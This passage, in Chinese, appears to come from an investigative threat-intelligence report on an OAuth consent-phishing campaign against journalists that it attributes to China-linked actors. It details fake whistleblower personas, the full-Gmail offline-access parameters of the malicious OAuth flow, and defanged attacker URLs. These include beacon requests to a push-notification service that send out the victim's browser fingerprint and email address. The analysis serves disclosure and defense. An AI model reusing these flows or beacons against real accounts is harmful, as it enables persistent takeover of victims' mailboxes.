ve********@g****.*** 。该部分电子邮件地址不仅与联系 Alecci 的电子邮件地址长度完全一致
vebefax002@gmail[.]com ,而且似乎与一个前两个字母相同的 Gmail 地址也吻合。此外,Hans Witting 账户关注了 Bin Bai 账户,这使我们高度确信该账户
@HWitting5943 与 Alecci 收到的恶意邮件有关。
还有迹象表明,该账号曾被用来攻击其他活动人士。汉斯·维廷发布的唯一一条推文是回复一位居住在日本的中国活动人士,他在推文中询问了对方的电子邮件地址。
恶意邮件、财新事件和白斌在X上的申诉之间存在重叠之处,这可以解释以下三种情况:
- 白斌的存在和身份都是捏造的,目的是为了维护这个人物形象。
- 攻击者从财新和 X 那里窃取了白斌的故事,并试图用它来欺骗 Alecci。
- 白斌的故事是真实的,相关的 X 账户是由攻击者创建和运营的,目的是为了支持他们的网络钓鱼攻击。
财新是中国一家私营媒体机构,以其对腐败问题的调查报道而闻名。2021年,中国政府将其从核准媒体名单中移除,导致其在国内的发行量大幅下降。此后,财新虽然维持了其声誉,但被怀疑通过不作为的方式进行审查,以规避中国的法律框架。基于以上信息,我们认为财新不太可能是有意参与中国政府精心策划的诱导行动,从而允许政府捏造事实来支持其报道。
我们发现了一些与财新网最初报道相符的网络内容,这些内容也支持白斌的存在,其中包括一位声称曾帮助白斌逃往日本的人。此人还声称,X账号并非白斌的真实账号。巧合的是,就在国际调查记者联盟(ICIJ)开始调查撰写这份报告前后,该账号被删除,显然是被其运营者删除的;该账号也删除了所有@baoliaoX 与白斌叛逃经历相关的帖子。 @HWitting5943 @baoliaoX
尽管我们无法独立核实此人关于与白斌会面的说法,但他的叙述支持了白斌的故事属实的假设。这两个账户在国际调查记者联盟(ICIJ)开始就此报告展开调查前后均被编辑和/或删除,这一巧合进一步质疑了白斌的X账户是否由其本人操作。国际调查记者联盟曾试图联系真正的白斌,但未能找到。
我们得出结论,攻击者很可能创建了这两个 @HWitting5943 账户@baoliaoX 。白斌账户是一个精心打造的虚拟人物,他们分享了他的故事,发布了他的照片,并与评论者互动。这种程度的投入表明,创建白斌账户是为了给核实邮件的记者提供一个可信的身份,并使他们更容易落入OAuth攻击的陷阱。攻击者盗用白斌的叙述,并花费大量精力提供信息来佐证他们的说法,这表明Alecci是他们的首要目标。
亮片鲤鱼:OAuth 攻击
网络钓鱼邮件
分析显示,发送给 Alecci 的电子邮件中提到的“加密存档”链接指向一个 Google 登录页面,该页面配置为生成并向攻击者提供开放授权 (OAuth) 令牌。OAuth 令牌允许用户在无需输入实际密码的情况下,授权应用程序或服务访问其帐户。用户授权后,令牌会授予应用程序访问其帐户某些内容的权限,在本例中,这些内容包括电子邮件、日历和联系人。该令牌用作“桥梁”,以实现对资源的身份验证,并且一直有效,直到该访问权限被明确撤销。此外,此次攻击还利用了“刷新令牌”。与有效期有限的传统访问令牌不同,刷新令牌允许应用程序随着时间的推移请求额外的访问令牌。这意味着即使更改了帐户密码,访问权限也可能继续有效,这使其成为攻击者访问帐户的理想方式。
最初诱饵中的链接托管在一个流行的云平台上,该平台的设计使其看起来很合法,并提供了一个名为“GoogleVerify.html”的文件, 其中包含受害者特定的参数,在本例中是目标的电子邮件地址。
hxxps://s3.dualstacks.us-east-1.amazonaws.com/ifans[.]online/uploads/GoogleVerify.html?id=[TARGET EMAIL ADDRESS]
用户访问初始的云端登录页面后,该页面会向 Google 发起真实的 OAuth 授权请求。随后,用户会被重定向到真实的 accounts.google.com 页面,该页面会显示一个真实的 Google OAuth 登录页面,请求用户授予第三方应用访问权限。用户完成身份验证和任何必要的双因素身份验证流程后,Google 会将浏览器重定向回攻击者控制的 OAuth 端点,攻击者会在该端点捕获授权码并将其交换为 OAuth 访问令牌。这些令牌可以提供对目标帐户的持久访问权限,而无需提供凭据,但用户的凭据也可能在网络钓鱼攻击中被窃取。
在本案例中,该页面发起了一个 Google OAuth 2.0 授权码流程
[https://mail.google[.]com/] ,请求了最广泛的 Gmail 权限,授予了对受害者收件箱的完全读取、写入、发送和删除权限。关键在于,该请求包含了
[access_type=offline] 一个长期有效的刷新令牌,即使在密码更改后,也能持续访问该帐户。
下表显示了攻击中使用的完整 URL 参数的细分以及每个组成部分的重要性。
范围 价值 意义
范围 https://mail.google.com/ 拥有完整的 Gmail 访问权限:读取、写入、发送、删除
访问类型 离线 生成持久刷新令牌,即使密码更改后该令牌仍然有效。
客户端 ID 578104943897-pnivs0ucof99fnr6l8kfrc2tenmr3nep.apps.googleusercontent.com 攻击者注册的 Google OAuth 应用
重定向 URI hxxps://a.web.oauth2-signal[.]com/gm-oauth2-callback 攻击者控制的服务器接收授权码
包含已授予的作用域 真的 默默地累积之前授予的所有权限
应用域 hxxps://a.web.oauth2-signal[.]com 攻击者注册的应用域名
流名称 通用 OAuth 流程 标准 Google OAuth 授权流程
服务 也 Google 的“登录服务 OAuth”——完整的帐户登录范围
表2
恶意 OAuth 授权流程中发送的完整 URL 的参数、值和意义分解。
除了恶意 OAuth 流程之外,还有两个额外的出站请求发送到hxxps://sctapi.ftqq[.]com,这是一个合法的中国服务,用于发送用户可配置的推送通知。第一个请求发送浏览器指纹:
hxxps://sctapi.ftqq[.]com:443/SCT96188ToxRyYX7UWYhASIGRXfL7AAzv.send?title=Gmail&desp=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F128.0.0.0%20Safari%2F537.36
hxxps://sctapi.ftqq[.]com:443/SCT96188ToxRyYX7UWYhASIGRXfL7AAzv.send?title=Gmail&desp=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F128.0.0.0%20Safari%2F537.36
第二个请求会发送引荐来源网址,其中包含目标用户的电子邮件地址。这表明攻击者可能设置了通知系统,以便在有人点击钓鱼链接时收到通知。
hxxps://sctapi.ftqq[.]com:443/SCT269149TJZWARwQ76bEWeM6Vjrgih583.send?title=Gmail&desp=3D[TARGET EMAIL]
hxxps://sctapi.ftqq[.]com:443/SCT269149TJZWARwQ76bEWeM6Vjrgih583.send?title=Gmail&desp=3D[TARGET EMAIL]
出于安全考虑,Alecci询问Bin Bai是否可以使用她个人邮箱以外的邮箱。2025年6月24日,Bin Bai回复并保证链接安全。虽然身份和邮箱地址保持不变——Bin Bai——但vebefax002@gmail[.]com发件人姓名从Hans Witting更改为冒充一位居住在美国的知名中国研究员,这表明攻击者在身份管理方面再次出现失误。我们未在其他OAuth攻击中发现这位研究员的姓名,但我们承认攻击者可能在其他攻击中冒充过他。
第二天,Alecci继续表达了她对使用个人邮箱的担忧。对此,化名Bin Bai的人声称,该链接是由“匿名良心救援队”提供的,并称正是该组织让他萌生了联系Alecci的想法。截至发稿时,我们未能找到任何关于“匿名良心救援队”的记录,唯一提及该组织的地方是Bin Bai的X账号的标题名称和帖子内容。
2025年6月26日,Alecci再次请求使用另一种方式访问存档文档。近一个月后,2025年7月17日,白斌回复了另一个OAuth攻击链接。该链接与第一封邮件中使用的攻击手段完全相同——它会发起一个合法的OAuth授权请求,如果用户输入了凭据,攻击者就能永久访问目标用户的帐户。
尽管两封邮件的发送时间间隔很长,但攻击者在两次尝试中都使用了相同的技术。这种模式表明,攻击者依赖于有限的几种攻击方法。这也与我们关于“闪光鲤鱼”(GLITTER CARP)和“亮片鲤鱼”(SEQUIN CARP)是两个不同组织的理论相符,因为他们不会在一种攻击失败后转向其他攻击方式。
第二位举报人联系
2025年9月19日,Alecci的个人邮箱收到了一封来自另一位自称举报人的邮件。这封邮件来自一个邮箱地址,caleb.books2001@gmail[.]com.发件人声称掌握了“一家跨国公司与某些政府官员之间存在严重不当行为”的证据,并提供了一个短链接供其查看文件。与Bin Bai案不同,Caleb Brooks这个身份似乎并非冒充任何人。
hxxps://megaview[.]click/pdf_to_scilla
hxxps://megaview[.]click/pdf_to_scilla
该链接重定向到托管在热门云平台上的另一个域名,并提供一个名为“GoogleCert.html”的文件,其中包含受害者特定的参数,在本例中为目标用户的姓名。攻击随后遵循与上文所述相同的OAuth令牌窃取流程。Alecci没有回复邮件,之后也没有人以该身份再次尝试联系她。
hxxps://peek-fans.s3.dualstack.ap-northeast-2.amazonaws[.]com/static/AXSxls235link/GoogleCert.html?=G_scilla
hxxps://peek-fans.s3.dualstack.ap-northeast-2.amazonaws[.]com/static/AXSxls235link/GoogleCert.html?=G_scilla
亮片鲤鱼:其他目标
我们利用发送给 Alecci 的 URL 的独特特征,特别是 URL 引用模式,在 Google 威胁情报/Virus Total(一个用户提交的恶意软件样本在线数据库)中进行搜索,从而识别出另一位遭受相同恶意 OAuth 攻击的记者。我们联系了这位记者,询问其疑似遭受攻击的情况,他/她向我们提供了电子邮件以供分析。这位记者并非“中国目标”报道团队的成员,而是一位专注于五角大楼的国防记者。他/她的个人邮箱收到了一封邮件,发件人声称掌握有关 2025 年 6 月 14 日美国陆军成立 250 周年阅兵式期间计划举行的抗议活动的信息。攻击者在身份伪装方面仍然面临挑战,因为发件人姓名和电子邮件地址不符。与 Alecci 的案例类似,发件人声称提供了一个加密链接,供记者访问相关信息。
当我们收到用于分析的链接时,该链接已失效,因此我们无法最终确认其是否为同一OAuth攻击流程。但基于攻击手法上的重叠之处——包括通过个人邮箱联系受害者、身份不符、声称提供加密链接以及类似的URL引用模式——我们可以合理推断,此次攻击与针对Alecci的攻击性质相似。
补充报告
我们观察到的针对这些记者的攻击与趋势科技在其关于TAOTH 活动的报告中提到的攻击几乎完全相同,特别是他们称之为“路径二”的网络钓鱼攻击,该攻击利用了一个虚假的登录网站,该网站会将用户重定向到一个合法的 OAuth 授权网站。这一评估基于以下几点:共享的基础设施、对用于信标的推送服务 sctapi.ftqq[.]com 的相同使用,以及受害者群体的重叠,特别是都提到记者是疑似攻击目标之一。
归因
我们对“闪光鲤鱼”(GLITTER CARP)和“亮片鲤鱼”(SEQUIN CARP)攻击的分析表明,数字跨国镇压日益通过分布式行动者网络运作。泄露信息、政府起诉书和其他安全研究人员的研究表明,该分布式网络越来越多地包含代表国家机关行事的私人承包商。我们高度确信,这两个行动者都与中国政府有关联。首先,我们在“闪光鲤鱼”和“亮片鲤鱼”中识别出的目标与中国政府的情报重点相符。在这两个案例中,我们都观察到了简体中文的使用:在icjiorg[.]org “闪光鲤鱼”部分攻击使用的域名以及汉斯·维廷(Hans Witting)和白斌(Bin Bai)的“亮片鲤鱼”X账户中。简体中文几乎在中国大陆被完全使用,这进一步表明这两个行动者都来自中国。此外,“亮片鲤鱼”的攻击者利用了一个专门针对中国利益的故事,并在其OAuth攻击中使用了合法的中国服务来发送推送通知。这一结论也得到了Proofpoint、Volexity和TrendMicro此前报道的支持,这些报道的调查结果同样指向一家中国实体。
本报告及其他报告记录的攻击目标范围之广,结合现有信息中关于中国过去和现在使用承包商的情况(与我们观察到的活动相吻合),可以较为肯定地表明,中国政府雇佣的商业实体可能与本文所述的两起攻击活动有关。以“闪光鲤鱼”(GLITTER CARP)为例,其针对海外侨民、记者的基础设施与Proofpoint观察到的针对台湾半导体行业的攻击存在重叠,这表明同一组织可能同时执行了多份合同。受害者的多样性与政府机构的行动模式不符,后者通常针对较小的目标群体,并专注于与五年计划直接相关的目标。“亮片鲤鱼”(SEQUIN CARP)的攻击者反复使用OAuth攻击,即使有机会使用其他漏洞利用方式,也依然如此,这表明他们的攻击手段有限。有限的攻击手段意味着攻击者的预算有限,这与中国政府和军方的预算不符。我们承认,虽然这种目标选择符合中国的国家利益,但一个国家实体不太可能在一次行动中集中精力进行如此广泛的目标选择,而且在第一次尝试失败后,也不太可能转向其他不同的攻击方式。
